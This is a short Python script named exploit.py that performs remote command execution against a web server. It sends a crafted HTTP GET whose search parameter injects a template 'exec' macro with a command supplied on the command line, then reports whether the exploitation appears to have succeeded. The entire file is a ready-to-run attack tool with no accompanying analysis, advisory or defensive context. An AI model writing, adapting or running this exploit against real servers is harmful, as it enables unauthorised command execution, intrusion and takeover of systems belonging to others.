exploit.py

import socket
import sys

timeout_duration = 5 # in seconds

def send_request(host, port, cmd):
    # Construct the HTTP request
    request = "GET /?search=%25x%25url%25:%host%}{.exec|" + \
        cmd +                                               \
        ".}{.break.} HTTP/1.1\r\n" +                        \
        "Host:\r\n\r\n"

    # Create a socket
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout_duration)
        
        try:
            # Connect to the server
            s.connect((host, port))
            # Send the HTTP request
            s.sendall(request.encode())
            # Receive the response
            response = s.recv(4096)
            print(response.decode())

            if '200 OK' in response.decode():
                print("[+] The exploitation seems to be successful.")
            else:
                print("[+] The exploitation seems NOT to be successful.")

        except socket.timeout:
            print("[-] The request timed out. Exiting...")
        except socket.error as e:
            print(f"[-] Socket error: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: python3 script.py <host> <port> <cmd>")
        sys.exit(1)

    host = sys.argv[1]
    port = int(sys.argv[2])
    cmd = sys.argv[3]

    send_request(host, port, cmd)